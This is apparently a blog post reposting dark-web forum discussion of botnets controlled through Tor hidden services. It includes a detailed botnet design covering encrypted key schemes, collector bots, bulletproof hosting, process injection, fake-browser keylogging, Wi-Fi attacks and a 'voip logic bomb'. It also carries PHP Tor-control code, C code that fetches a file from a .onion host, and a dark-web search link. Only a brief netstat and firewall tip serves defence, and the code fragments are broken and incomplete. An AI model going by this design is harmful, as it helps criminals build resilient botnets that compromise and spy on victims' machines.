Are Criminals Using Tor-onion- Controlled Botnet

gAtO aSkEd – are criminals using Tor-.onion network to run botnets?  I started searching in the deep dark web and found some interesting discussion threads. I copied them down from different places in onion land. But a simple search in “the abyss-search engines”— http://nstmo7lvh4l32epo.onion — dark web search engine can let you see a few places were Tor-controlled botnets are being sold, discussed and a place were you can ask questions and get back some real answers since they’re in the .onion.

So this may shed some light on this what hackers and criminals are talking about, and see how the bad guy’s are doing it- I just want to learn. -gAtO oUt 


  • Is there any good reason for a botnet not to contact an onionland server for C&C? It seems like that would make it harder to shut down, since you can’t find the server. What reason am I missing for this not being done more often?
  • This is actually very simple to implement. I’ve been working on a project that does this for a few months that’s pretty much complete.
  • My bot uses a hidden service to pull down a custom torrc, this file contains information on private directory servers which it then uses to connect to a private tor network.
  • The bot can choose weather to stay on the public tor network or connect to a privet network depending on what the C&C tells it to do.
  • If it connects to the private network it does a check to see if the client machine is hosted behind a NAT, if it’s not it becomes a relay and exit node.
  • I’m a newbie coder and wrote this in C so it is very easy to do. I’m just in the process of porting the whole thing over to linux atm.
  • The most obvious way to do this would be to install Tor on compromised systems and have the bots set up to issue their commands through Tor.
  • Another way would be to just run the C&C server on Tor and have the bots use a tor to web proxy, either a public one or you could set up your own on compromised servers. The downside with this approach is that it would be a lot easier to block and shut down.
  • A third option is to run your own Tor network and have the clients with higher bandwidth and up-time act as relays. This would seem like the most difficult approach and would require you to run your own root server which would lessen the resilience of the botnet.
  • I prefer the idea of using the normal Tor network with bots acting as clients only. This option seems like it would be pretty easy to set up and would insulate you from a lot of the risks normally associated with running a botnet. I’m not sure if this would require much modification to the Tor code.
  • Assuming the network was only to comprise of Windows machines you could use the Tor Expert Package. If Tor could be installed from the command line and have it hide from the system as much as possible, such as not creating Start Menu entries and Desktop icons, then this could have some potential without really much work at all. Does anyone know if this is possible, can Tor be installed from the command line with flags that set the options that would need disabling and without popping up an install wizard? If this is possible then Tor wouldn’t even need modifying at all.
  • As far as I can see, assuming Tor is not compromised and you are careful about how you do it, this seems like the best way to run a resilient botnet. If the C&C server code is secure and you keep the attack surface to a minimum this sort of network would resist a lot of scrutiny before it could effectively be mitigated.

gAtOmAlO LaB nOtEs

Working on a similar project. Dark Umbrella fast flux/domain flux hybrid approach

(In development about 3-5 months left)

bot coded in assembly no dependencies

Each build has maximum of 10k bots to ovoid widespread av detection.

Basic bot uses socks5.

built in ssh client


Bot is built with 30k pre generated 256 bit AES keys.

1 256 bit AES key for logs

1 256 bit AES key ssh

1 256 bit AES key socks 5

hwid it selects a pre-generated key 256 bit AES key.

Bot writes encrypted data into common file using stenography

process injection

Download/Upload Socks5

Bot sends data to a collector bot via socks5 through ipv6 which makes NAT traversal a trivial matter.

Using ipv6 in ipv4 tunnel.

Collector bot assembly

tor and i2p Plug-ins C++

Assuming 10k bots

Bots will be assigned into small groups of 25. And are assigned 400 collectors bots which is evenly 200 tor and 200 i2p.

Collector packages the encrypted logs and imports them into a .zip or rar archive and uses sftp to upload through tor to a bullet proof server Note the Ukraine is best know

Russia is no good.

(Domain-flux .onion panel can be easily moved)

Using a Ubuntu Server on bullet proof server.

Using tor and Privoxy. Panel can be routed through multiple cracked computers using proxychains and ssh.

Server uses a simple .onion panel with php5 and apache2 and mysql.

You might ask what happens if bullet proof server is down. The collector bots can be loaded with 5 .onion panels. If panel fails for 24 hours its removed from all Collectors and bot will go to the next one and so forth.

A python Daemon runs and unzip the data and Imports it into a mysql database were it remains encrypted.

The bot master uses my Dark panel to connect to the remote Bullet Proof server through a vpn and then through tor using ssh to run remote commands on server and

sftp to upload and download. Running tor through a log less vpn through with a trusted exit node on the tor network. .net panel connects to mysql database database is decrypted

on .NET panel (Note must real Bullet Proof hosting is not trust worthy this solves that issue) and imported into a local .mdb database. Then later the bot Master should encrypt

database folder on true crypt. Commands are sent to bots individually rather then corporately like most bot nets. This allows for greater anonymity It will be possible to send

commands corporately but strongly discouraged. Collector bots download and upload large files through i2p.

1.Connects remotely to rpc daemon through backconect and simplifying metasploit (Working)

2.Social network cracker. (in development)

3.Statics. (Working)

4.Anonymity status. (Working)

5.Decrypt-er. Decryption codes in highly limiting each build to 10k bots. (Working)

6.Daemon status (Working)

7.logs (Working)

8.Metasploit connects via rpc. (working)

9. GPS tracked Assets by Google maps and using net-book with a high powered external usb wifi attenas.

Starts an automatic attack if wep if wpa2 grabes handshake. If open starts basic arp spoofing attack. Common browser exploits. (in development)

10.Teensy spread. (in development)

11.vnc back connect. (working)

12. Advanced Persistent threat. Fake Firefox, Fake Internet Explorer, Fake Chrome. Fake Windows Security Essentials. (in development allows for excellent custom Bot-master defined keyloging)

13. Dark search bot index file is downloaded allowing easy searching of hard drives. (Working)

14. voip logic bomb. bot computer is sent via a voip call file once played through voip the microphone hears mp3 file and the dormant payload is activated in bot that is the logic bomb. (in development)

bot Plug-ins developed later

Each Panel is hwid

1 unique build per Copy embedded into panel.


function tor_new_identity($tor_ip='', $control_port='9051', $auth_code=''){
$fp = fsockopen($tor_ip, $control_port, $errno, $errstr, 30);
if (!$fp) return false; //can't connect to the control port

fputs($fp, “AUTHENTICATE $auth_codern”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //authentication failed

//send the request to for new identity
fputs($fp, “signal NEWNYMrn”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //signal failed

return true;

* Load the TOR’s “magic cookie” from a file and encode it in hexadecimal.
function tor_get_cookie($filename){
$cookie = file_get_contents($filename);
//convert the cookie to hexadecimal
$hex = ”;
for ($i=0;$i<strlen($cookie);$i++){
$h = dechex(ord($cookie[$i]));
$hex .= str_pad($h, 2, ‘0’, STR_PAD_LEFT);
return strtoupper($hex);


#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <curl/types.h>
#include <curl/easy.h>
#include <string>
#include <ctime>

size_t write_data(void *ptr, size_t size, size_t nmemb, FILE *stream) {
size_t written;
written = fwrite(ptr, size, nmemb, stream);
return written;

void startTor() {

int main(void) {

//    startTor();

CURL *curl;
FILE *fp;
CURLcode res;
char *url = “http://46lm7zhgildryehk.onion/files/msg.sig&#8221;;
char outfilename[FILENAME_MAX] = “C:\msg.sig”;
curl = curl_easy_init();
if (curl) {
fp = fopen(outfilename,”wb”);
curl_easy_setopt(curl, CURLOPT_PROXY, “”);
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
res = curl_easy_perform(curl);

return 0;


Now first gAtO will give you the counter-measures you see if they run Tor then a simple “netstat -ar |grep LISTEN” at any unix terminal will show you what is open and who and what is LISTENing on what ports:../

Now when I only only using Tor to browse: I run —>  :MacOS gatomalo$ netstat -av |grep LISTEN 

Tor Browser – tcp4       0      0  *.9030                 *.*                    LISTEN

after I run Tor manually to use system commands I can see my ticket out of the :MacOS gatomalo$ netstat -av |grep LISTEN

Tor tcp4       0      0  localhost.9050    *.*    LISTEN

Tor Bundle tcp4       0      0  *.9030                 *.*    LISTEN

So turn off 9050 port in your firewall.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: